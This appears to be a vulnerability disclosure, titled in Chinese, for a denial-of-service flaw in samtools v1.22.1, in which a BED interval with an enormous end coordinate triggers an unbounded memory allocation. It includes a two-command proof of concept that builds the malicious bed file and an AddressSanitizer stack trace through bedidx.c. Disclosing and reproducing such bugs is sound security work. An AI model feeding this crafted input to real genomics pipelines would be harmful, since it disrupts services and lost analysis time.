Samtools v1.22.1因大型BED区间导致不受控内存分配引发拒绝服务漏洞

1
2
3
4

echo -e "chr1\t0\t2305843009213693940" > bad.bed

# 使用samtools触发DoS
samtools view -L bad.bed big.bam

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

=================================================================
==1060879==ERROR: AddressSanitizer: requested allocation size
0x10000000000000 (0x10000000001000 after adjustments for alignment, red
zones etc.) exceeds maximum supported size of 0x10000000000 (thread T0)

    #0 0xaad05674fd5c in realloc (/root/samtools/samtools+0xdfd5c)
(BuildId: 031fb204568f835410c0dd07ee99a915c9a7b660)

    #1 0xaad0568afc64 in hts_resize_array_ /root/htslib/hts.c:5070:15

    #2 0xaad056873d80 in bed_index_core /root/samtools/bedidx.c:120:13

    #3 0xaad056873d80 in bed_index /root/samtools/bedidx.c:149:17

    #4 0xaad056872780 in bed_read /root/samtools/bedidx.c:348:9

    #5 0xaad0567958b4 in main_samview /root/samtools/sam_view.c:1066:33

    #6 0xaad0567d5b40 in main /root/samtools/bamtk.c:246:55

    #7 0xfffaacef2290 in __libc_start_call_main
csu/../sysdeps/nptl/libc_start_call_main.h:58:16

    #8 0xfffaacef2374 in __libc_start_main csu/../csu/libc-start.c:360:3

    #9 0xaad0566acc6c in _start (/root/samtools/samtools+0x3cc6c) (BuildId:
031fb204568f835410c0dd07ee99a915c9a7b660)